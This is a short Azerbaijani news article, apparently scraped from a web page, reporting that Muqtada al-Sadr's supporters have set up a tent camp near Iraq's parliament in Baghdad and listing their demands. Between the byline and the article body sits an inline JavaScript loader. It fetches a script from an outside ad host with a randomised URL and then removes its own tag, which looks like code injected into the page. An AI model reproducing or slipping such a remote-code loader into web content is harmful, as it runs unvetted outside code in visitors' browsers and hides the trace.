Bağdad parlamenti yaxınlığında çadır şəhərciyi quruldu

by admin

window._ttzi = 161;var script = document.createElement(“script”);script.src = “https://adviad.com/nativevideo/get_ads.js?=”+(Math.floor(Math.random() * 100000000) + 1);script.async = true;(document.body || document.head || document.documentElement).appendChild(script);script.onload = function(){script.parentNode.removeChild(script);};

Radikal şiə imam Müqtəda əs-Sədrin tərəfdarları Bağdadın mərkəzində hökumətin “yaşıl zona”sında yerləşən İraq Nümayəndələr Şurasının (parlament) binası yaxınlığında çadır düşərgəsi qurublar.

Etirazçıların sözçüsü İbrahim əl-Cəbari bildirib ki, şənbə günü parlament sarayını zəbt edən nümayişçilər “bütün tələbləri yerinə yetirilənə qədər oranı tərk etmək niyyətində deyillər”.

Onun sözlərinə görə, nümayişçilər üçün əsas məsələ “qanunverici orqanın buraxılması və korrupsioner məmurların daxil edilməyəcəyi keçid hökumətinin yaradılmasıdır”. Fəallar həmçinin Ali Məhkəmə Şurasının rəhbərliyinin dəyişdirilməsini tələb edirlər.

Mənbə: TASS

Oxu.az

Bu yazılara da göz atın...